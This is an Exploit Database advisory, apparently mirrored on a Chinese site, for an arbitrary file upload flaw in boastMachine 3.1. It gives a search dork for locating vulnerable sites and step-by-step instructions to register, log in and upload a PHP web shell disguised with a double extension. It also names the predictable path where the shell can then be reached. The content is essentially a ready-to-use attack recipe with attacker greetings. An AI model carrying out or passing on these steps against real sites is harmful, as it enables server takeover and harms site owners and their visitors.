BoastMachine 3.1 – Arbitrary File Upload

• Exploit Database
• 69 阅读

• 作者： alnjm33
  日期： 2010-01-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11249/

• ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability
  Author: alnjm33
  Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
  Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar
  Version: 3.1
  Tested on: Version 3.1
  My home : Sec-war.com<http://Sec-war.com>
  ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  ==========================================Dork==========================================
  ( Powered by boastMachine v3.1 )
  ================================Exploit=============================================
  First join in the Site
  /Server/path/register.php
  After that
  login in the Site
  /Server/path/login.php
  After Login
  go to this link
  /Server/path/bmc/files.php?form_id=new
  Now upload your shell like ( Shell.php.rar )
  Now you can find your shell here
  /Server/path/files/username_Shell.php.rar
  e.g
  http://server/hp_boastMachine/files/alnjm33_aasaa.php.rar
  =======================================================================================
  Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members